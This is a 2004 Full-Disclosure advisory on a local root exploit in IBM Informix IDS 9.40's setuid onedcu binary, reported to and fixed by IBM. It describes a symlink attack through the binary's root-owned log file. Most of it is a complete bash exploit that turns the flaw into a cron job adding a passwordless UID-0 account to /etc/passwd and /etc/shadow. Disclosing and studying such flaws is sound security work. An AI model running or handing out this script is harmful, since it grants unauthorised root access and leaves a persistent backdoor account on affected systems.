From pask@open3s.com Thu Jan 29 20:44:36 2004 From: pask@open3s.com To: "[Full Disclosure]" Date: Tue, 27 Jan 2004 15:30:55 +0100 (CET) Subject: [Full-Disclosure] OPEN3S-2003-08-08-eng-informix-onedcu ----------========== OPEN3S-2003-08-08-eng-informix-onedcu ==========---------- Title: Local Vulnerability in IBM Informix IDSv9.40 onedcu binary Date: 08-08-2003 Platform: Only tested in Linux but can be exported to others. Impact: Users with exec perm over ./bin/onedcu can create files with 666 mode and owned by root. Author: Juan Manuel Pascual Escriba Status: Solved by IBM Corp. PROBLEM SUMMARY: There is a write permisions checking error in onedcu binary that can be used by local users with exec perm over onedcu to write any file owned by root with mode 666. DESCRIPTION onedcu is installed with 6755 perm and owned by root.informix in my default installation [informix@dimoni onedcu]$ ls -alc /home/informix-9.40/bin/onedcu -rwsr-sr-x 1 root informix 1066468 Aug 8 23:39 /home/informix-9.40/bin/onedcu The binary does'nt drop privileges before writing the log and writes \001 file owned by root: IMPACT: Easy to overwrite or create new files owned by root (.rhosts, cron files) via link injection. EXPLOIT #!/bin/bash ONEDCU=/home/informix-9.40/bin/onedcu CRONFILE=/etc/cron.hourly/pakito USER=pakito DIR=./trash export INFORMIXDIR=/home/informix-9.40/ export ONCONFIG=onconfig.std if [ -d $DIR ]; then echo Trash directory already created else mkdir $DIR fi cd $DIR if [ -f ./"\001" ]; then echo Link Already Created else ln -s $CRONFILE `echo -e "\001"` fi umask 000 $ONEDCU & kill -9 `pidof $ONEDCU` echo "echo "#!/bin/bash"" > $CRONFILE echo "echo "$USER:x:0:0::/:/bin/bash" >> /etc/passwd" >> $CRONFILE echo "echo "$USER::12032:0:99999:7:::" >> /etc/shadow" >> $CRONFILE echo " " echo " This vulnerability was researched by Juan Manuel Pascual Escriba" echo " 08/08/2003 Barcelona - Spain pask@open3s.com echo " " echo " must wait until cron execute $CRONFILE and then exec su pakito" STATUS Reported to IBM security team at 11th of August 2003 See more infomartion about this vulnerability and workaround at: http://www-1.ibm.com/support/docview.wss?uid=swg21153336 This vulnerability was managed in an efficient manner by Jonathan Leffler from IBM Informix Database Engineering Team. -------------------------------------------------- This vulnerability was researched by: Juan Manuel Pascual Escriba pask@open3s.com Barcelona - Spain http://www.open3s.com _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html